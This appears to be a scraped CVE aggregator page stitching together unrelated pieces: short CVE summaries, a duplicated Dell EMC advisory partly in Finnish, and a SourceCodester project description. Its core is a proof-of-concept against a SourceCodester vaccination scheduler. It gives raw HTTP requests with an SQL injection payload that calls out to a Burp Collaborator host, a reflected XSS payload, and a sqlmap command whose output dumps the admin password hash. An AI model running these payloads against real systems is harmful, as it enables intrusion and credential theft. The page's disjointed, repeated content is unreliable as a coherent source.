Groovy Code Injection & SpEL Injection which lead to Remote Code Execution. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2021-45029

User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVE-2022-23944

The HTTP response will disclose the user password. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVE-2022-23223

Dell EMC Data Protection Central versions 19.5 and prior contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user could potentially exploit this vulnerability, allowing port scanning of external hosts.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-43588

Dell EMC Data Protection Central version 19.5 contains an Improper Input Validation Vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to denial of service.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

CVE-2021-36349

Dell EMC Data Protection Central versions 19.5 and earlier contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user may potentially exploit this vulnerability, allowing port scanning of external hosts.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

 

**Third-party Component**

**CVEs**

**More information**

ntp

CVE-2016-9310

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Apache CXF

CVE-2021-30468

CVE-2021-22696

CVE-2020-13954

Openssl

CVE-2021-3712

Apache HttpClient

CVE-2014-3577

CVE-2012-5783

CVE-2020-13956

CVE-2015-5262

CVE-2012-6153

Spring Framework

CVE-2021-22118

Cron-utils

CVE-2020-26238

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-43588

Dell EMC Data Protection Central version 19.5 contains an Improper Input Validation Vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to denial of service.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

CVE-2021-36349

Dell EMC Data Protection Central versions 19.5 and earlier contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user may potentially exploit this vulnerability, allowing port scanning of external hosts.

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

 

**Third-party Component**

**CVEs**

**More information**

ntp

CVE-2016-9310

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Apache CXF

CVE-2021-30468

CVE-2021-22696

CVE-2020-13954

Openssl

CVE-2021-3712

Apache HttpClient

CVE-2014-3577

CVE-2012-5783

CVE-2020-13956

CVE-2015-5262

CVE-2012-6153

Spring Framework

CVE-2021-22118

Cron-utils

CVE-2020-26238

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell EMC Data Protection Central

Versions before 19.6

19.6

Link

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell EMC Data Protection Central

Versions before 19.6

19.6

Link

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2021/01/10

Initial Release

1.1

2021/01/21

Corrected CVE Identifier

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

**Arvostele tämä artikkeli**

Kaikki kentät ovat pakollisia, jollei toisin ole merkitty.

CVE-2021-36349: DSA-2021-262: Dell EMC Data Protection Central Security Update for Multiple Security Vulnerabilities

SQL injection in Sourcecodester Try My Recipe (Recipe Sharing Website - CMS) 1.0 by oretnom23, allows attackers to execute arbitrary code via the rid parameter to the view_recipe page.

CVE-2021-41928: CVE-nu11secur1ty/vendors/oretnom23/CVE-nu11-17-092921 at main · nu11secur1ty/CVE-nu11secur1ty

TeslaMate before 1.25.1 (when using the default Docker configuration) allows attackers to open doors of Tesla vehicles, start Keyless Driving, and interfere with vehicle operation en route. This occurs because an attacker can leverage Grafana login access to obtain a token for Tesla API calls.

CVE-2022-23126: How I got access to 25+ Tesla’s around the world. By accident. And curiosity.

Cross site scripting (XSS) vulnerability in Sourcecodester Online Covid Vaccination Scheduler System v1 by oretnom23, allows attackers to execute arbitrary code via the lid parameter to /scheduler/addSchedule.php.

**CVE-2021-36621****Vendor**

![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/CVE-nu11-18-09-2821/screen.PNG)

**Description**

Sourcecodester Online Covid Vaccination Scheduler System 1.0 is vulnerable to SQL Injection, XSS-STORED PHPSESSID Hijacking, and remote SQL Injection - bypass Authentication. The attacker can be hijacking the PHPSESSID by using this vulnerability and then he can log in to the system and exploit the admin account. Next, exploitation: For MySQL vulnerability, the username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, an attacker can decrypt and obtain the plain-text password. Hence, the attacker could authenticate as an Administrator.

**Request MySQL:**

GET /scheduler/addSchedule.php?lid=(select%20load\_file('%5c%5c%5c%5ciugn0izvyx9wrtoo6c6oo16xeokh87wyymp9fx4.burpcollaborator.net%5c%5cgfd'))&d= HTTP/1.1
Host: localhost
Cookie: PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: \*/\*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

**Respond MySQL:**

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:17:00 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: \*
Content-Length: 5045
Connection: close
Content-Type: text/html; charset=UTF-8

<style\>
#uni\_modal .modal-content>.modal-header,#uni\_modal .modal-content>.modal-footer{
display:none;
}
#uni\_modal .modal-body{
padding-top:0 !important;
}
#location\_modal{
direct
...\[SNIP\]...

**Live test:**

    http://localhost/scheduler/addSchedule.php?lid=(select%20load_file(%27%5c%5c%5c%5ciugn0izvyx9wrtoo6c6oo16xeokh87wyymp9fx4.burpcollaborator.net%5c%5cgfd%27))
    

*   proof: ![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/CVE-nu11-18-09-2821/docs/scheduler-CVE-Critical.gif)

**Request XSS:**

GET /scheduler/addSchedule.php?lid=5&d=v6qfw%3cscript%3ealert(1)%3c%2fscript%3eytpic HTTP/1.1
Host: localhost
Cookie: PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: \*/\*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

**Respond XSS:**

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:16:57 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: \*
Content-Length: 4576
Connection: close
Content-Type: text/html; charset=UTF-8

<style\>
#uni\_modal .modal-content>.modal-header,#uni\_modal .modal-content>.modal-footer{
display:none;
}
#uni\_modal .modal-body{
padding-top:0 !important;
}
#location\_modal{
direct
...\[SNIP\]...
<h3>Schedule Form: (v6qfw<script\>alert(1)</script\>ytpic)</h3>
...\[SNIP\]...

**Live test:**

*   proof: ![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/raw/main/vendors/oretnom23/CVE-nu11-18-09-2821/docs/XSS.gif)

**PoC:**

python sqlmap.py python C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\sqlmap.py \-u "http://localhost/scheduler/classes/Login.php?f=login" \--data="username=admin&password=nu11secur1ty" --cookie="PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump

**OUTPUT:**

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? \[y/N\] N
sqlmap identified the following injection point(s) with a total of 157 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL \>\= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 9211 FROM (SELECT(SLEEP(5)))oCqY) AND 'giEC'='giEC&password=nu11secur1ty
---
\[19:49:38\] \[INFO\] the back-end DBMS is MySQL
\[19:49:38\] \[WARNING\] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? \[Y/n\] Y
web application technology: PHP 7.4.22, Apache 2.4.48
back-end DBMS: MySQL \>\= 5.0.12 (MariaDB fork)
\[19:49:43\] \[INFO\] fetching entries of column(s) 'password,username' for table 'users' in database 'scheduler'
\[19:49:43\] \[INFO\] fetching number of column(s) 'password,username' entries for table 'users' in database 'scheduler'
\[19:49:43\] \[INFO\] retrieved: 1
\[19:49:49\] \[WARNING\] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
\[19:49:56\] \[INFO\] adjusting time delay to 1 second due to good response times
0192023a7bbd73250516f069df18b500
\[19:51:46\] \[INFO\] retrieved: admin
\[19:52:02\] \[INFO\] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools \[y/N\] N
do you want to crack them via a dictionary-based attack? \[Y/n/q\] N
Database: scheduler
Table: users
\[1 entry\]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
+----------+----------------------------------+

\[19:52:02\] \[INFO\] table 'scheduler.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\scheduler\\users.csv'
\[19:52:02\] \[INFO\] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'

\[\*\] ending @ 19:52:02 /2021-09-28/


C:\\Users\\venvaropt\\Desktop\\scheduler-CVE-Critical-CVE-18-09-2821\>

**Reproduce:**

href

**Proof:**

href

CVE-2021-41930: CVE-nu11secur1ty/vendors/oretnom23/CVE-nu11-18-09-2821 at main · nu11secur1ty/CVE-nu11secur1ty

There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.

CVE-2022-23437

SQL injection vulnerability in Sourcecodester Online Leave Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter to /leave_system/classes/Login.php.

Submitted by oretnom23 on Monday, August 23, 2021 - 01:30.

![](https://www.sourcecodester.com/sites/default/files/styles/large/public/images/oretnom23/admin_employee_record.png?itok=MCHIE_Vb)

I have created a **PHP Project** entitled **Online Employee Leave Management System**. This PHP Project provides the company's management and employees an online platform to manage the leave applications. The application is mobile-responsive which is helpful nowadays because most of the employees owning a personal mobile smartphone. Using this system, the employees can easily apply for leave even they are not present in the office. Also, management can easily track the employees' leave records annually and this application has a feature that prevents the employee to apply if they already consumed their leave credits. Each employee's leave privileges are manageable here which means the management can manage the employee's leave privilege and credits individually. The employees' leave credits are automatically reset annually. This online application also generates a printable date-wise report for leave applications.

****About the Online Employee Leave Management System****

This web application was developed using **PHP, MySQL Database, HTML, CSS, JavaScript (Ajax & jQuery), Bootstrap, AdminLTE Template, and some other libraries/plugins**. I created this project using **XAMPP** version 3.30 and does have a **PHP version of 8.0.7**.

The **Online Employee Leave Management System** is easy to use and has a pleasant user interface. This consists of 3 types of system users which are the **Admin**, **Staff**, and **Employee**. The **Admin User** has access and can manage all the features and functionalities of the system. The **Staff User** has only restricted access to some features and functionalities does the **Admin** has. Lastly, the **Employee User** can only track his/her leave records, manage his/her application, and manage his/her system account/credentials.

****Features******Admin Side**

*   **Secure Login/Logout**
*   **Dashboard**
*   **Manage Department List**
*   **Manage Designation List**
*   **Manage List of Leave Types**
*   **Manage Employee List**
*   **Manage Employee's Leave Privilege**
*   **Manage Leave Applications**
*   **Manage User List**
*   **Update Leave Application's Status**
*   **Print Employees Leave Records**
*   **Generate Leave Application Report**
*   **Manage System Settings**
*   **Manage Account Credentials**

**Staff Side**

*   **Secure Login/Logout**
*   **Dashboard**
*   **Manage Employee List**
*   **Manage Employee's Leave Privilege**
*   **Manage Leave Applications**
*   **Update Leave Application's Status**
*   **Print Employees Leave Records**
*   **Generate Leave Application Report**
*   **Manage System Settings**
*   **Manage Account Credentials**

**Employees Side**

*   **Secure Login/Logout**
*   **Dashboard**
*   **View Leave Records**
*   **Print Leave Records**
*   **Create Leave Application**
*   **Manage Leave Application**
*   **Manage Account Credentials**

**System Snapshots******Employee's Record Page****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/admin_employee_record_0.png)

****Leave Application List (Admin)****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/admin_leave_list.png)

****New Employee Form****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/employee_form.png)

****Manage Employee's Leave Privilege and Credits****

![Leave Management System](https://www.sourcecodester.com/sites/default/files/images/oretnom23/manage_leave_previlege.png)

The source code is free to download on this website. Feel Free to Download and Modify the source code the way you wanted to meet your requirements. Follow the instructions below to run the project.

****How to Run ??****

**`Requirements`**

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

**`Installation/Setup`**

1.  **Open** your **XAMPP/WAMP's Control Panel** and start the **`Apache`** and **`MySQL`**.
2.  **Extract** the **downloaded source code **zip** file**.
3.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
4.  **Browse** the **`PHPMyAdmin`** in a **browser**. i.e. **`http://localhost/phpmyadmin`**
5.  **Create** a **new database** naming **`leave_db`**.
6.  **Import** the provided **`SQL`** file. The file is known as **`leave_db.sql`** located inside the **database** folder.
7.  **Browse** the **Online Employee Leave Management System** in a **browser**. i.e. **`http://localhost/leave_system`**.

**Default Admin Access Information**

Username: **admin**  
Password: **admin123**

_Note: Newly created employee's default system password is his/her Employee ID._

****DEMO****

That's it. You can now explore the features and functionalities of this **Online Employee Leave Management System** that was developed using **PHP Language** and **MySQL Database**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   4635 views

Tag

#apache